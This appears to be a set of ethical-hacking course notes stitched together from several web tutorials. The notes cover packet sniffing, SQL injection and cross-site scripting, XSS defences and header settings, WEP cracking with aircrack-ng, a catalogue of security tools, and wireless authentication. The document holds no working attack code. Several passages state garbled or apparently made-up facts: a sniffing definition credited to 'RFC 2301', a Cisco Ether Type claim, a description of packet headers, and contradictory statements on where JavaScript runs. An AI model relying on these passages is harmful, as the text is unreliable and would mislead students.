security. They can capture data across network protocols like FTP, TCP/IP, HTTP, and SMTP.
This versatility makes them invaluable for identifying network issues like packet loss,
congestion, and incorrect configurations.
However, the use of sniffers also brings up significant privacy and ethical concerns. They are
particularly problematic when used by malicious actors for data breach (theft) and network
intrusions.
Comprehending Active and passive Sniffing:

Active sniffing

• In this sniffing type, attacker directly interacts with target machine by

sending packets and receiving responses.
• This sniffing is carried out through Switch. In this type, attacker tries to
poison the switch by sending bogus MAC address.
• Examples of active sniffing : ARP spoofing, MAC flooding, HTTPS and SSH
spoofing, DNS spoofing etc.

Passive sniffing
 • In this sniffing type, attacker does not interact with the target. He/she
simply hook on to the network and captures packets transmitted and received
by the network or exchanged between two machines.
• This sniffing is carried out through hub. An attacker connects to the hub from
his/her machine. Attacker needs account on the LAN.
• Examples of passive sniffing: Hub based networks or wireless network

UNIT-IV

Web application vulnerabilities

involve a system flaw or weakness in a web-based application. They have been
around for years, largely due to not validating or sanitizing form inputs,
misconfigured web servers, and application design flaws, and they can be exploited
to compromise the application’s security.

These vulnerabilities are not the same as other common types of vulnerabilities,
such as network or asset. They arise because web applications need to interact with
multiple users across multiple networks, and that level of accessibility is easily taken
advantage of by hackers.

There are web application security solutions designed specifically for applications,
and as such it’s important to look beyond traditional vulnerability scanners when it
comes to identifying gaps in an organization’s application security. To really
understand your risks, learn more about common types cybersecurity attacks, and
how web scanners can help increase the safety of your applications.

SQL Injection Attacks

Structured Query Language (SQL) is now so commonly used to manage and direct
information on applications that hackers have come up with ways to slip their own
SQL commands into the database.

These commands may change, steal or delete data, and they may also allow the
hacker access to the root system. SQL (officially pronounced ess-cue-el, but
commonly pronounced “sequel”) stands for structured query language; it’s a
programming language used to communicate with databases. Many of the servers
that store critical data for websites and services use SQL to manage the data in thei r
databases.

An SQL injection attack specifically targets this kind of server, using malicious code
to get the server to divulge information it normally wouldn’t. This is especially
problematic if the server stores private customer information from the web site or
web application, such as credit card numbers, usernames and passwords
(credentials), or other personally identifiable information, which are tempting and
lucrative targets for an attacker.

Successful SQL injection attacks typically occur because a vulnerable application

doesn’t properly sanitize inputs provided by the user, by not stripping out anything
that appears to be SQL code. For example, if an application is vulnerable to an
injection attack, it may be possible for an attacker to go to a webs ite's search box
and type in code that would instruct the site's SQL server to dump all of its stored
usernames and passwords for the site.

Learn more about SQL injection attacks.

Cross-Site Scripting (XSS)

In an SQL injection attack, an attacker goes after a vulnerable website to target its
stored data, such as user credentials or sensitive financial data. But if the attacker
would rather directly target a website's users, they ma y opt for a cross-site scripting
attack. Similar to an SQL injection attack, this attack also involves injecting
malicious code into a website or web-based app. However, in this case the malicious
code the attacker has injected only runs in the user's browser when they visit the
attacked website, and it goes after the visitor directly.

One of the most common ways an attacker can deploy a cross-site scripting attack
is by injecting malicious code into an input field that would be automatically run
when other visitors view the infected page. For example, they could embed a link to
a malicious JavaScript in a comment on a blog.

Cross-site scripting attacks can significantly damage a web company’s reputation by

placing the users' information at risk without any indication that anything malicious
even occurred. Any sensitive information a user sends to the site or the
application—such as their credentials, credit card information, or other private
data—can be hijacked via cross-site scripting without the owners realizing there was
even a problem in the first place.

Learn more about cross-site scripting attacks.

Cross-site Scripting
Cross-site scripting is also known as XSS. When malicious JavaScript is executed by a
hacker within the user's browser, then cross-site scripting will occur. In this attack, the
code will be run within the browser of the victim. Upon initial injection, the attacker does
not fully control the site. Instead, the malicious code is attacked on the top of a valid
website by the bad actor. Whenever the website is loaded, the malware will be executed,
and this will load to trick the browser.

JavaScript in XSS
JavaScript is a programming language that runs on a web server inside. The interactivity
and functionality are added to the web page using the client-side code. It is used
extensively on CMS platforms or all major applications. If the JavaScript code exists
inside our browser, it will not impact the website's visitors, unlike the server-side
language like PHP. JavaScript cannot run on the server because it is client-side. Using the
background requests, it can interact with the server. An attacker can use these
background requests to add malicious content to a web page without refreshing the
web page. These requests can perform the actions asynchronously or gather analytics
about the browser of the client.

Working of Cross-site scripting

When the attacker exploits a vulnerability on the software of a website, only then can
they inject their code into a web page of the victim's website. After successfully
exploiting the vulnerability, attackers can inject their script, which will be executed using
the browser of the victim.

When the victim's browser page successfully runs the JavaScript, sensitive information
about the target user can be accessed from the session. The session allows an attacker to
target the administrator of the site and completely compromise a website.

The cross-site scripting attack will be very useful when most of the publically available
pages on the website have vulnerabilities. In this case, the malicious code can be injected
by adding their malicious content, phishing prompt, ads on the website to target the
website's visitors.

Types of Cross-site scripting attacks

There are various ways to use cross-site scripting on the basis of our goals. The most
common type of cross-site scripting attacks is as follows:

Stored Cross-site scripting attack

When a payload is stored by the attacker on the compromised server, in this case, a
stored cross-site scripting attack will occur. Due to this, the malicious code will be
delivered by the website to the other visitors. In this attack, the initial action is only
required by the attacker, and due to this, many visitors have to be compromised. The
stored cross-site attack is the most dangerous cross-site scripting. An example of this
attack includes the fields of our profile like our email id, username, which are stored by
the server and displayed on our account page.

Reflected Cross-site scripting attack

When the data is sent from browser to server, and the payload is stored in that data, in
this case, reflected cross-site scripting would occur. An example of this attack includes a
contact form or website's search data sent to the target and contains a malicious script.
Search form is another type of reflected cross-site attack in which a search query is sent
by the visitor to the server, and the result can only be seen by visitors. Victim's custom
links are sent by the attackers that direct visitors towards the vulnerable page.

Self Cross-site scripting attack

When the vulnerability is exploited by the attacker, which requires manual changes and
extremely specific context, in this case, self cross-site scripting attack will occur. Specific
changes include setting our information to a payload or cookies values types of things.

Blind Cross-site scripting attack

When the result of an attack cannot be seen by an attacker, in this case, blind cross-site
scripting will occur. In a blind cross-site scripting attack, the vulnerability lies on that
page, which can only be accessed by authorized users. If the attacker wants to
successfully launch an attack, this requires more preparation for this. The attack will not
get any notification if the payload fails. Hackers can also use polyglots if they want to
increase the success rate of these types of attacks. Polyglots can work in different
scenarios like a script tag, plain text, and attributes.

DOM-Based Cross-site scripting attack

When the JavaScript on the page is vulnerable to cross-site scripting (XSS), rather than
the server itself, in this case, the DOM-based cross-site scripting attack will occur. The
JavaScript can add interactivity to the page. It can also add arguments in the URL, which
is used to modify the page after loading it. The malicious code can be added to a page
while modifying the DOM when the user's value is not sanitized. When the URL provides
the languages and the website change into these languages rather than the default
language, this shows the example of DOM-based cross-site scripting.

Prevention of Cross-site scripting attacks

The website vulnerabilities can be exploited using the variety of methods leveraged by
an attacker. If we want to reduce the risk of cross-site scripting, there is no single
strategy. Unsafe user input helps the cross-site scripting attacks because it is directly
rendered onto the website's web page. This attack would be impossible if the inputs of
the user are properly sanitized. We can ensure that the inputs of users cannot be
escaped on our website using multiple ways. Using the following protective measures,
we can harden our web applications and protect our website.

Whitelist Values

We can restrict the input of a user to a specific whitelist. This practice allows us to only
send the safe and known value to the server. If we know about the receiving data, like
the content of the drop-down menu, the restricted user input will only work.
 Restrict HTML in Inputs

HTML is limited to trusted users. If we want to allow formatting and styling on an input,
we can use Markdown instead of HTML to generate the content. If we want to use HTML,
we should sanitize it with a robust sanitizer like DOMPurify, which is used to remove all
the unsafe code.

ADVERTISEMENT

ADVERTISEMENT

Sanitize value

If we are using content on a page generated by a user, we should ensure that it would
not result in HTML content by using entities in place of unsafe characters. The
appearance of regular characters and entities are the same, but the entity cannot
generate HTML.

Use HTTPOnly Flags on Cookies

Session cookies are used to allow a website to recognize a user between requests. An
attacker frequently exfiltrates the user's cookies and steal the admin session. Once the
attacker steals the cookies of a user, they can log in to the account of the admin without
authorized access or credentials. HttpOnly cookies are used to prevent the JavaScript
from reading the cookie's content and increase the difficulty of an attacker to steal the
session. Using this method, we can only prevent our cookies from the attacker. An
attacker can still act as an admin user and send a request using the active browser
session. If the attacker uses cookies as the main identification mechanism, in this case,
this method will be only useful.

Use WAF

We can virtually patch attacks against our website using the firewall. This method is used
to intercept the requests like SQLi, RCE, XSS before our website get malicious requests.
The large scale attacks like DDOS can also be protected by it.

HTTP headers | X-XSS-Protection

Read

Courses

Jobs


 HTTP headers are used to pass additional information with HTTP response or HTTP
requests. The X-XSS-Protection in HTTP header is a feature that stops a page from
loading when it detects XSS attacks. This feature is becoming unnecessary with
increasing content-security-policy of sites.
XSS attacks: The XSS stands for Cross-site Scripting. In this attack, the procedure is to
bypass the Same-origin policy into vulnerable web applications. When the HTML code
generated dynamically and the user input is not sanitized only then the attacker can use
this attack. In this attack, an attacker can insert his own HTML code into the webpage
which will be not detected by the browsers. For his own HTML code attacker can easily
gain access to the database and the cookies. To stop this kind of attacks X-XSS Protection
was used in previous days.
Syntax:
X-XSS-Protection: directive
Type of XSS Attack: Cross site scripting attacks are broadly classified into two
categories.
 Server XSS: In this type of attack hacker attaches untrusted data with the HTML
response. In this case, vulnerability is present at the server end and the browser just
runs the script present in the response.
 Client XSS: In this type of XSS attack unsafe javascript is used to update the DOM
data. If we add javascript code in DOM with a javascript call, such a javascript call is
called an unsafe javascript call.
Directives: In this headers filed there are four directives:
 0: It disables the X-XSS-Protection.
 1: It is the by default directive and enables the X-XSS-Protection.
 1; mode=block: It enables the X-XSS-Protection. If the browser detects an attack, it
will not render the page.
 1; report=<reporting-URI>: It enables the X-XSS-Protection. If the Cross-site
Scripting attack detected then the page will be sanitizes and reported by report-uri
directive.
Example 1: Block pages from loading when they detect reflected Cross-site Scripting
attacks:
 HTML

// It enable the protection

X-XSS-Protection: 1; mode=block

// It disable the protection

X-XSS-Protection: 0

Example 2: This will work on an apache server.

 HTML

<IfModule mod_headers.c>

Header set X-XSS-Protection "1; mode=block"

</IfModule>

Example 3: This will work on Nginx server.

 html

add_header "X-XSS-Protection" "1; mode=block";

Supported Browsers: The browsers supported by HTTP headers X-XSS-

Protection are listed below:
 Google Chrome
 Internet Explorer
 Safari
 Opera

UNIT-V
Hacking wireless network
Introduction

Sales of wireless LANs to home users and small businesses will soar this
year, with products using IEEE 802.11 (Wi-Fi) technology leading the way,
according to a report by Cahners research. Worldwide, consumers will buy
7.3 million wireless LAN nodes--which include client and network hub
devices--up from about 4 million last year. This third book in the
"HACKING" series from Syngress is written by the SoCalFreeNet Wireless
Users Group and will cover 802.11a/b/g (“Wi-Fi”) projects teaching these
millions of Wi-Fi users how to "mod" and "hack" Wi-Fi access points,
network cards, and antennas to run various Linux distributions and create
robust Wi-Fi networks.
Cahners predicts that wireless LANs next year will gain on Ethernet as the
most popular home network technology. Consumers will hook up 10.9
million Ethernet nodes and 7.3 million wireless out of a total of 14.4
million home LAN nodes shipped. This book will show Wi-Fi enthusiasts
and consumers of Wi-Fi LANs who want to modify their Wi-Fi hardware
how to build and deploy “homebrew” Wi-Fi networks, both large and
small.

ROLE OF WEP:

Since wireless networks transmit data through radio waves, data can be easily intercepted
unless security measures are in place. Introduced in 1997, Wired Equivalent Privacy (WEP)
was the first attempt at wireless protection. The aim was to add security to wireless networks
by encrypting data. If wireless data were intercepted, it would be unrecognizable to the
interceptors since it had been encrypted. However, systems that are authorized on the
network would be able to recognize and decrypt the data. This is because devices on the
network make use of the same encryption algorithm.

WEP encrypts traffic using a 64- or 128-bit key in hexadecimal. This is a static key, which
means all traffic, regardless of device, is encrypted using a single key. A WEP key allows
computers on a network to exchange encoded messages while hiding the messages' contents
from intruders. This key is what is used to connect to a wireless-security-enabled network.

One of WEP’s main goals was to prevent Man-in-the-Middle attacks, which it did for a time.
However, despite revisions to the protocol and increased key size, various security flaws were
discovered in the WEP standard over time. As computing power increased, it became easier
to exploit for criminals to exploit those flaws. Because of its vulnerabilities, the Wi-Fi Alliance
officially retired WEP in 2004. Today, WEP security is considered obsolete, although it is still
sometimes in use – either because network administrators haven’t changed the default
security on their wireless routers or because devices are too old to support newer encryption
methods like WPA.

CRACKING WEP KEYS:

In order to crack WEP, we need first to capture the large number of packets that means we
can capture a large number of IVs. Once we have done that, we will use a tool called aircrack-
ng. This tool will be able to use statistical attacks to determine the key stream and the WEP
key for the target network. This method is going to be better when we have more than two
packets, and our chances of breaking the key will be higher.

Let's look at the most basic case of cracking a WEP key. To do this, we will set WiFi card in
monitor mode. After this, we will run a command airodump-ng wlan0 to see all of the
networks that are within our Wi-Fi range and then we will target one of those networks.
Where wlan0 stands for the interface.

SNIFFING TRAFFIC WIRELESS DOS ATTACKS :

A sniffing attack can also be used in an attempt to recover a passphrase, such as

when an SSH private key has been compromised. The sniffer captures SSH packets
containing encrypted versions of the password being typed by the user at their
terminal, which can then be cracked offline using brute force methods

 The term “sniffing” is defined in RFC 2301 as: “Any act of capturing network
traffic and replaying it, usually for the purpose of espionage or sabotage.”
 This definition is not accurate for UNIX-based systems, since any traffic can
be sniffed as long as either the attacker has access to network interfaces
(NIC) or modifies packets that could not be altered in transit. Sniffing can be
performed using a special program like tcpdump, tcpflow, or LanMon that is
connected to a port over which the packets can be inspected remotely.
 Another sniffing attack called ARP spoofing involves sending forged Address
Resolution Protocol (ARP) messages to the Ethernet data link layer. These
messages are used to associate a victim machine’s IP address with a
different MAC address, leading the targeted machine to send all its traffic
intended for the victim through an attacker-controlled host.
 This is used to both hijack sessions and also cause flooding of the network
via a denial-of-service attack (see Smurf attack).
Every IP packet contains, in addition to its payload, two fields: an IP header,
and an Ethernet header encapsulating it.
 The combination of these two headers is often referred to as a “packet” by
those who work with internet communications. An attacker can, therefore,
view and modify an IP packet’s IP header without having to see its payload.
 The Ethernet header contains information about the destination MAC
address (the hardware address of the recipient machine) and the Ether
Type field contains a value indicating what type of service is requested (e.g.,
precedence or flow control).
 The Ether type could be “0xFFFF”, indicating that no service fields were
included for the Ethernet frame. This was used in Cisco’s implementation
prior to version 8.0.
WLAN SCANNERS:

The purpose of a WiFi scanner is to discover all nearby WiFi networks and collect as much
information about them as possible. The collected information includes everything from
network names and their security settings to signal strength, noise level, interference

WLAN SNIFFERS:

When any data has to be transmitted over the computer network, it is broken down
into smaller units at the sender’s node called data packets and reassembled at
receiver’s node in original format. It is the smallest unit of communication over a
computer network. It is also called a block, a segment, a datagram or a cell. The act
of capturing data packet across the computer network is called packet sniffing. It is
similar to as wire tapping to a telephone network. It is mostly used by crackers and
hackers to collect information illegally about network. It is also used by ISPs,
advertisers and governments. ISPs use packet sniffing to track all your activity.

 who is receiver of your email

 what is content of that email
 what you download
 sites you visit
 what you looked on that website
 downloads from a site
 streaming events like video, audio, etc.
Advertising agencies or internet advertising agencies are paid according to:
 number of ads shown by them.
 number of clicks on their ads also called PPC (pay per click).
To achieve this target, these agencies use packet sniffing to inject
advertisements into the flowing packets. Most of the time these ads contain
malware.
Government agencies use packet sniffing to:
 ensure security of data over the network.
 track an organisation’s unencrypted data.
Packet Sniffer – Packet sniffing is done by using tools called packet sniffer. It can be
either filtered or unfiltered. Filtered is used when only specific data packets have to
be captured and Unfiltered is used when all the packets have to be captured.
WireShark, SmartSniff are examples of packet-sniffing tools.
How to prevent packet sniffing –
 Encrypting data you send or receive.
 using trusted Wi-Fi networks.
 Scanning your network for dangers or issues.
Advantages:
 Network troubleshooting: Packet sniffing can be used to identify network
problems by examining the packets and identifying issues such as network
congestion, packet loss, or improper configuration.
 Security analysis: Packet sniffing can be used to detect and analyze
security threats, such as network intrusions, malware infections, or
unauthorized access attempts.
 Network optimization: Packet sniffing can be used to optimize network
performance by identifying bottlenecks and optimizing the network
configuration.
 Protocol analysis: Packet sniffing can be used to analyze network protocols
and identify areas where they can be improved or optimized.

Disadvantages:
  Privacy violations: Packet sniffing can be used to intercept sensitive
information, such as passwords, credit card numbers, or personal
information, which can be used for malicious purposes.
 Legal issues: In many jurisdictions, packet sniffing is illegal without the
express consent of all parties involved in the communication.
 Resource usage: Packet sniffing can consume a significant amount of
system resources, especially if large amounts of network traffic are being
analyzed.
 Complexity: Packet sniffing can be a complex process, requiring specialized
knowledge and tools to analyze network traffic effectively.

HACKING TOOLS:

NMAP
Nmap stands for Network Mapper. It is an open source tool that is used widely for
network discovery and security auditing. Nmap was originally designed to scan
large networks, but it can work equally well for single hosts. Network
administrators also find it useful for tasks such as network inventory, managing
service upgrade schedules, and monitoring host or service uptime.

Nmap uses raw IP packets to determine −

 what hosts are available on the network,

 what services those hosts are offering,
 what operating systems they are running on,
 what type of firewalls are in use, and other such characteristics.

Nmap runs on all major computer operating systems such as Windows, Mac OS X,
and Linux.

Metasploit
Metasploit is one of the most powerful exploit tools. It’s a product of Rapid7 and
most of its resources can be found at: [Link]. It comes in two
versions − commercial and free edition. Matasploit can be used with command
prompt or with Web UI.

With Metasploit, you can perform the following operations −

 Conduct basic penetration tests on small networks

 Run spot checks on the exploitability of vulnerabilities
 Discover the network or import scan data
  Browse exploit modules and run individual exploits on hosts

Burp Suit
Burp Suite is a popular platform that is widely used for performing security testing
of web applications. It has various tools that work in collaboration to support the
entire testing process, from initial mapping and analysis of an application's attack
surface, through to finding and exploiting security vulnerabilities.

Burp is easy to use and provides the administrators full control to combine
advanced manual techniques with automation for efficient testing. Burp can be
easily configured and it contains features to assist even the most experienced
testers with their work.

Angry IP Scanner
Angry IP scanner is a lightweight, cross-platform IP address and port scanner. It can
scan IP addresses in any range. It can be freely copied and used anywhere. In order
to increase the scanning speed, it uses multithreaded approach, wherein a
separate scanning thread is created for each scanned IP address.

Angry IP Scanner simply pings each IP address to check if it’s alive, and then, it
resolves its hostname, determines the MAC address, scans ports, etc. The amount
of gathered data about each host can be saved to TXT, XML, CSV, or IP-Port list
files. With help of plugins, Angry IP Scanner can gather any information about
scanned IPs.

Cain & Abel

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It helps
in easy recovery of various kinds of passwords by employing any of the following
methods −

 sniffing the network,

 cracking encrypted passwords using Dictionary, Brute-Force and
Cryptanalysis attacks,
 recording VoIP conversations,
 decoding scrambled passwords,
 recovering wireless network keys,
 revealing password boxes,
 uncovering cached passwords and analyzing routing protocols.
Cain & Abel is a useful tool for security consultants, professional penetration
testers and everyone else who plans to use it for ethical reasons.

Ettercap
Ettercap stands for Ethernet Capture. It is a network security tool for Man-in-the-
Middle attacks. It features sniffing of live connections, content filtering on the fly
and many other interesting tricks. Ettercap has inbuilt features for network and
host analysis. It supports active and passive dissection of many protocols.

You can run Ettercap on all the popular operating systems such as Windows, Linux,
and Mac OS X.

EtherPeek
EtherPeek is a wonderful tool that simplifies network analysis in a multiprotocol
heterogeneous network environment. EtherPeek is a small tool (less than 2 MB)
that can be easily installed in a matter of few minutes.

EtherPeek proactively sniffs traffic packets on a network. By default, EtherPeek

supports protocols such as AppleTalk, IP, IP Address Resolution Protocol (ARP),
NetWare, TCP, UDP, NetBEUI, and NBT packets.

SuperScan
SuperScan is a powerful tool for network administrators to scan TCP ports and
resolve hostnames. It has a user friendly interface that you can use to −

 Perform ping scans and port scans using any IP range.

 Scan any port range from a built-in list or any given range.
 View responses from connected hosts.
 Modify the port list and port descriptions using the built in editor.
 Merge port lists to build new ones.
 Connect to any discovered open port.
 Assign a custom helper application to any port.

QualysGuard
QualysGuard is an integrated suite of tools that can be utilized to simplify security
operations and lower the cost of compliance. It delivers critical security intelligence
on demand and automates the full spectrum of auditing, compliance and
protection for IT systems and web applications.
QualysGuard includes a set of tools that can monitor, detect, and protect your
global network.

WebInspect
WebInspect is a web application security assessment tool that helps identify
known and unknown vulnerabilities within the Web application layer.

It can also help check that a Web server is configured properly, and attempts
common web attacks such as parameter injection, cross-site scripting, directory
traversal, and more.

LC4
LC4 was formerly known as L0phtCrack. It is a password auditing and recovery
application. It is used to test password strength and sometimes to recover lost
Microsoft Windows passwords, by using dictionary, brute-force, and hybrid
attacks.

LC4 recovers Windows user account passwords to streamline migration of users to

another authentication system or to access accounts whose passwords are lost.

LANguard Network Security Scanner

LANguard Network Scanner monitors a network by scanning connected machines
and providing information about each node. You can obtain information about
each individual operating system.

It can also detect registry issues and have a report set up in HTML format. For each
computer, you can list the netbios name table, current logged-on user, and Mac
address.

Network Stumbler
Network stumbler is a WiFi scanner and monitoring tool for Windows. It allows
network professionals to detect WLANs. It is widely used by networking
enthusiasts and hackers because it helps you find non-broadcasting wireless
networks.

Network Stumbler can be used to verify if a network is well configured, its signal
strength or coverage, and detect interference between one or more wireless
networks. It can also be used to non-authorized connections.
ToneLoc
ToneLoc stands for Tone Locator. It was a popular war dialling computer program
written for MS-DOS in the early 90’s. War dialling is a technique of using a modem
to automatically scan a list of telephone numbers, usually dialling every number in
a local area code.

Malicious hackers use the resulting lists in breaching computer security - for
guessing user accounts, or locating modems that might provide an entry-point into
computer or other electronic systems.

It can be used by security personnel to detect unauthorized devices on a

company’s telephone network.

Wireless Network Security

Wireless Network provides various comfort to end users but actually they are very
complex in their working. There are many protocols and technologies working
behind to provide a stable connection to users. Data packets traveling through wire
provide a sense of security to users as data traveling through wire probably not
heard by eavesdroppers.
To secure the wireless connection, we should focus on the following areas –
 Identify endpoint of wireless network and end-users i.e., Authentication.
 Protecting wireless data packets from middleman i.e., Privacy.
 Keeping the wireless data packets intact i.e., Integrity.
We know that wireless clients form an association with Access Points (AP) and
transmit data back and forth over the air. As long as all wireless devices follow
802.11 standards, they all coexist. But all wireless devices are not friendly and
trustworthy, some rogue devices may be a threat to wireless security. Rogue devices
can steal our important data or can cause the unavailability of the network.
Wireless security is ensured by following methods-
 Authentication
 Privacy and Integrity
In this article, we talk about Authentication. There are broadly two types of
Authentication process: Wired Equivalent Privacy (WEP), and Extensible
Authentication Protocol (802.1x/EAP).
These are explained as following below.
1. Wired Equivalent Privacy (WEP) :
For wireless data transmitting over the air, open authentication provides no security.
WEP uses the RC4 cipher algorithm for making every frame encrypted. The RC4
cipher also encrypts data at the sender side and decrypt data at the receiving site,
using a string of bits as key called WEP key.
WEP key can be used as an authentication method or encryption tool. A client can
associate with AP only if it has the correct WEP key. AP tests the knowledge of the
WEP key by using a challenge phrase. The client encrypts the phrase with his own
key and send back to AP. AP compares the received encrypted frame with his own
encrypted phrase. If both matches, access to the association is granted.

`
2. Extensible Authentication Protocol (802.1x/EAP) :
In WEP authentication, authentication of the wireless clients takes place locally at
AP. But Scenario gets changed with 802.1x. A dedicated authentication server is
added to the infrastructure. There is the participation of three devices –
1. Supplicant –
Device requesting access.
2. Authenticator –
Device that provides access to network usually a Wlan controller (WLC).
3. Authentication Server –
Device that takes client credentials and deny or grant access.

EAP is further of four types with some amendments over each other –
 LEAP
 EAP-FAST
 PEAP
 EAP-TLS